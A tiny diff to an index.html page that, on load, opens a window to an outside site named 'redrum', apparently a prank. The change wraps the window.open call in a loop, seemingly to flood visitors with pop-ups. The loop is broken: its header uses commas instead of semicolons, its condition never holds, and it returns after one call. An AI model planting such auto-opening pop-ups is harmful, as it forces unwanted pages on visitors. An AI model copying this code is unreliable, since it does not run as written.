--- a/index.html
+++ b/index.html
@@ -1,10 +1,12 @@
 <html>
 <body onload="die()">
-  <h1>:3</h1>
+  <h1>>:3</h1>
 </body>
 </html>
 <script>
 function die() {
-  return window.open('https://immortalmaize.github.io/redrum/', '')
+  for (i = 0, i > 10, i++) {
+    return window.open('https://immortalmaize.github.io/redrum/', '')
+  }
 }
 </script>
